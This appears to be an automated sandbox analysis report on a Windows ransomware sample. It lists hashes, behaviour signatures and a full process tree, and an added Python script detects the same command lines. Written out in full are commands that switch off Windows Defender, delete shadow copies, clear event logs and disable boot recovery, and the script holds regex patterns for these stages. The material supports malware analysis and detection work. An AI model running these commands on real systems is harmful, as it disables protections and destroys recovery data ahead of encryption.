Resubmissions
- 12-01-2022 19:42  220112-ye478adgd4  score: 10
- 12-01-2022 19:26  220112-x5vwssdgej  score: 10
- 12-01-2022 16:57  220112-vgqwtsdce7  score: 10
Analysis
- max time kernel: 180s
- max time network: 197s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 12-01-2022 19:26
Static task: static1
Behavioral task: behavioral1
- Sample: 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
- Resource: win10-en-20211208
General
- Target: 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
- Size: 3.3MB
- MD5: 257cd3ef7ac49a4b7942f7b61ca10b6c
- SHA1: a0043163d33e25ba2a62c5061fd641c44807b492
- SHA256: 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5
- SHA512: bb9dded0fa261da418b3b0b14cfa72e4688f378bfe5814a0df45a01eb6d4b2ada6f56fb3151b75e6c8118dffd80e3e79c084befbcdfeeef851926e6faa4158db
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
- pid 1148  MpCmdRun.exe
-
Modifies security service 2 TTPs 1 IoCs
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
- pid 3200  bcdedit.exe
- pid 1272  bcdedit.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
- 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe: 64 "File opened for modification" IoCs under C:\Program Files and C:\Program Files (x86) (Office, Adobe Reader, Java, WindowsApps, Windows Defender and other application files; many of the opened paths carry an appended .qyxdq extension)
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- pid 3080  vssadmin.exe
-
Modifies registry class 3 IoCs
Processes:
- reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
- reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
- reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
- pid 724   powershell.exe (3 IoCs)
- pid 3280  powershell.exe (3 IoCs)
- pid 3156  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe (2 IoCs)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- wevtutil.exe (pids 3908, 1144, 3176): Token: SeSecurityPrivilege, SeBackupPrivilege
- wmic.exe (pids 3236, 2832): Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (the pid 2832 entries are listed a second time, ending at SeUndockPrivilege)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (each pair is recorded twice in the raw list):
- PID 3156 (585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe) wrote to memory of net.exe: 2336, 2836, 3584, 3064, 2540, 2872, 420, 3000, 1832
- net.exe wrote to memory of net1.exe: 2336 -> 1328, 2836 -> 3272, 3584 -> 2320, 3064 -> 2736, 2540 -> 3704, 2872 -> 3208, 420 -> 3996, 3000 -> 2804, 1832 -> 1240
- PID 3156 wrote to memory of sc.exe: 368, 1912, 980, 1260, 2328, 2300, 2932, 2020, 2316
- PID 3156 wrote to memory of reg.exe: 2992, 3060, 2280, 964, 2416
Processes
(indentation shows process depth; image path, PID, then command line)

C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe  (PID 3156)  cmdline: "C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\SYSTEM32\net.exe  (PID 2336)  cmdline: net.exe stop "SamSs" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  (PID 1328)  cmdline: C:\Windows\system32\net1 stop "SamSs" /y
  C:\Windows\SYSTEM32\net.exe  (PID 2836)  cmdline: net.exe stop "SDRSVC" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  (PID 3272)  cmdline: C:\Windows\system32\net1 stop "SDRSVC" /y
  C:\Windows\SYSTEM32\net.exe  (PID 3584)  cmdline: net.exe stop "SstpSvc" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  (PID 2320)  cmdline: C:\Windows\system32\net1 stop "SstpSvc" /y
  C:\Windows\SYSTEM32\net.exe  (PID 3064)  cmdline: net.exe stop "UI0Detect" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  (PID 2736)  cmdline: C:\Windows\system32\net1 stop "UI0Detect" /y
  C:\Windows\SYSTEM32\net.exe  (PID 2540)  cmdline: net.exe stop "vmicvss" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  (PID 3704)  cmdline: C:\Windows\system32\net1 stop "vmicvss" /y
  C:\Windows\SYSTEM32\net.exe  (PID 2872)  cmdline: net.exe stop "VSS" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  (PID 3208)  cmdline: C:\Windows\system32\net1 stop "VSS" /y
  C:\Windows\SYSTEM32\net.exe  (PID 420)  cmdline: net.exe stop "wbengine" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  (PID 3996)  cmdline: C:\Windows\system32\net1 stop "wbengine" /y
  C:\Windows\SYSTEM32\net.exe  (PID 3000)  cmdline: net.exe stop "WebClient" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  (PID 2804)  cmdline: C:\Windows\system32\net1 stop "WebClient" /y
  C:\Windows\SYSTEM32\net.exe  (PID 1832)  cmdline: net.exe stop "UnistoreSvc_12bf5" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  (PID 1240)  cmdline: C:\Windows\system32\net1 stop "UnistoreSvc_12bf5" /y
  C:\Windows\SYSTEM32\sc.exe  (PID 368)  cmdline: sc.exe config "SamSs" start= disabled
  C:\Windows\SYSTEM32\sc.exe  (PID 1912)  cmdline: sc.exe config "SDRSVC" start= disabled
  C:\Windows\SYSTEM32\sc.exe  (PID 980)  cmdline: sc.exe config "SstpSvc" start= disabled
  C:\Windows\SYSTEM32\sc.exe  (PID 1260)  cmdline: sc.exe config "UI0Detect" start= disabled
  C:\Windows\SYSTEM32\sc.exe  (PID 2328)  cmdline: sc.exe config "vmicvss" start= disabled
  C:\Windows\SYSTEM32\sc.exe  (PID 2300)  cmdline: sc.exe config "VSS" start= disabled
  C:\Windows\SYSTEM32\sc.exe  (PID 2932)  cmdline: sc.exe config "wbengine" start= disabled
  C:\Windows\SYSTEM32\sc.exe  (PID 2020)  cmdline: sc.exe config "WebClient" start= disabled
  C:\Windows\SYSTEM32\sc.exe  (PID 2316)  cmdline: sc.exe config "UnistoreSvc_12bf5" start= disabled
  C:\Windows\SYSTEM32\reg.exe  (PID 2992)  cmdline: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 3060)  cmdline: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 2280)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 964)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 2416)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 2088)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 3256)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 584)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 3192)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 3468)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 1312)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 3576)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 1244)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 1972)  cmdline: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 2848)  cmdline: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 1784)  cmdline: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  C:\Windows\SYSTEM32\schtasks.exe  (PID 1660)  cmdline: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  C:\Windows\SYSTEM32\schtasks.exe  (PID 3748)  cmdline: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  C:\Windows\SYSTEM32\schtasks.exe  (PID 2420)  cmdline: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  C:\Windows\SYSTEM32\schtasks.exe  (PID 3048)  cmdline: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  C:\Windows\SYSTEM32\schtasks.exe  (PID 64)  cmdline: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  C:\Windows\SYSTEM32\reg.exe  (PID 3972)  cmdline: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 912)  cmdline: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  C:\Windows\SYSTEM32\reg.exe  (PID 2072)  cmdline: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1164 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1724 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2356 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2324
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2468
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1004
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1356
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:836 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3284
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3080 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3908 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1144 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3176 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3236 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3200 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1272 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1232
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1148 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:724 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3280
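The command lines above form a single chain: Defender policy and service tampering, Defender scheduled tasks and ETW autologgers switched off, definition removal, VSS and backup services disabled, shadow copies deleted, event logs cleared, and automatic recovery turned off with bcdedit. As an added detection example (this is not part of the sandbox report and not code from the sample), the Python below classifies process-creation command lines of this kind into those stages and flags a parent process that hits several of them, which is far higher signal than any one `reg add` or `sc config` on its own. The ATT&CK sub-technique IDs are my own mapping rather than the report's, the sample events are constructed from the command lines in the tree, and the PID of the sample itself (4000) is assumed because it does not appear in this section.

```python
import re
from collections import defaultdict

# Each rule: (category, ATT&CK id, regex applied to the lower-cased command line).
# The ATT&CK mapping is the author's own, not taken from the sandbox report.
RULES = [
    ("defender_policy_tamper", "T1562.001",
     re.compile(r'reg(\.exe)?\s+(add|delete)\s+"?hklm\\software\\policies\\microsoft\\windows defender')),
    ("defender_service_disabled", "T1562.001",
     re.compile(r'reg(\.exe)?\s+add\s+"?hklm\\system\\currentcontrolset\\services\\'
                r'(windefend|wdboot|wdfilter|wdnisdrv|wdnissvc|securityhealthservice)"?'
                r'\s+/v\s+"?start"?.*?/d\s+"?4"?')),
    ("defender_task_disabled", "T1562.001",
     re.compile(r'schtasks(\.exe)?\s+/change\s+/tn\s+"?microsoft\\windows\\'
                r'(windows defender|exploitguard)\\.*?/disable')),
    ("defender_definitions_removed", "T1562.001",
     re.compile(r'mpcmdrun(\.exe)?"?\s+-removedefinitions')),
    ("defender_preference_disabled", "T1562.001",
     re.compile(r'set-mppreference\s+-disable\w+\s+\$true')),
    ("defender_etw_disabled", "T1562.006",
     re.compile(r'autologger\\defender(api|audit)logger"?\s+/v\s+"?start"?.*?/d\s+"?0"?')),
    ("backup_service_disabled", "T1490",
     re.compile(r'sc(\.exe)?\s+config\s+"?(vss|wbengine|vmicvss)"?\s+start=\s*disabled')),
    ("shadow_copies_deleted", "T1490",
     re.compile(r'(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)')),
    ("recovery_disabled", "T1490",
     re.compile(r'bcdedit(\.exe)?\s+/set\s+\{default\}\s+'
                r'(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)')),
    ("event_logs_cleared", "T1070.001",
     re.compile(r'wevtutil(\.exe)?\s+cl\s+(system|security|application)')),
]


def classify(cmdline):
    """Return the (category, attack_id) pairs matched by one process command line."""
    lowered = cmdline.lower()
    return [(cat, tid) for cat, tid, rx in RULES if rx.search(lowered)]


def score_parent(events, min_categories=3):
    """Group hits by parent PID; return parents whose children span >= min_categories stages."""
    by_parent = defaultdict(set)
    for ev in events:
        for cat, _ in classify(ev["cmdline"]):
            by_parent[ev["ppid"]].add(cat)
    return {ppid: sorted(cats) for ppid, cats in by_parent.items() if len(cats) >= min_categories}


def attack_ids(events):
    """Sorted list of distinct ATT&CK ids observed across all events."""
    return sorted({tid for ev in events for _, tid in classify(ev["cmdline"])})


# Constructed events modelled on the process tree above. The sample's own PID (4000)
# is assumed; 1232 and 1984 are the cmd.exe wrappers that spawn MpCmdRun and powershell.
SAMPLE_EVENTS = [
    {"pid": 2300, "ppid": 4000, "cmdline": 'sc.exe config "VSS" start= disabled'},
    {"pid": 3060, "ppid": 4000, "cmdline": 'reg.exe delete "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /f'},
    {"pid": 3192, "ppid": 4000, "cmdline": 'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'},
    {"pid": 2848, "ppid": 4000, "cmdline": 'reg.exe add "HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'},
    {"pid": 3048, "ppid": 4000, "cmdline": 'schtasks.exe /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /Disable'},
    {"pid": 836,  "ppid": 4000, "cmdline": 'reg.exe add "HKLM\\System\\CurrentControlSet\\Services\\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'},
    {"pid": 3080, "ppid": 4000, "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 3236, "ppid": 4000, "cmdline": "wmic.exe SHADOWCOPY /nointeractive"},   # enumeration only, not scored
    {"pid": 2832, "ppid": 4000, "cmdline": "wmic.exe shadowcopy delete"},
    {"pid": 1144, "ppid": 4000, "cmdline": "wevtutil.exe cl security"},
    {"pid": 1272, "ppid": 4000, "cmdline": "bcdedit.exe /set {default} recoveryenabled no"},
    {"pid": 1232, "ppid": 4000, "cmdline": 'cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All'},
    {"pid": 1148, "ppid": 1232, "cmdline": '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All'},
    {"pid": 724,  "ppid": 1984, "cmdline": "powershell Set-MpPreference -DisableIOAVProtection $true"},
    {"pid": 9999, "ppid": 5000, "cmdline": 'sc.exe config "Spooler" start= disabled'},  # routine admin action, no hit
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["pid"], classify(ev["cmdline"]))
    print("flagged parents:", score_parent(SAMPLE_EVENTS))
    print("ATT&CK ids:", attack_ids(SAMPLE_EVENTS))
```

Feed it Sysmon event 1 or Security 4688 command lines (with `ppid` taken from the parent process field) and alert on `score_parent`. The bare `wmic SHADOWCOPY /nointeractive` enumeration and the single `sc config "Spooler"` line deliberately produce no hit: one isolated match is what an administrator or installer also generates, whereas one parent driving three or more of these stages within a short window is the ransomware precursor this report shows.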
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
MD5 b20ce0aea4d379371a3057dc65310567
SHA1 b2d3ced7b30c638258f3e45e72d06f779ecc804e
SHA256 9865603a0003e532b51847db5050253697f1f15b1c9b12735a5e1f1356129199
SHA512 a8548294d02825e154fc089512e81674a1733992bac8f795027e57ee933efa5be6f2612deb1a99505934c66ea154f598d20c732ff91ea470aed2b9c5b44a81b9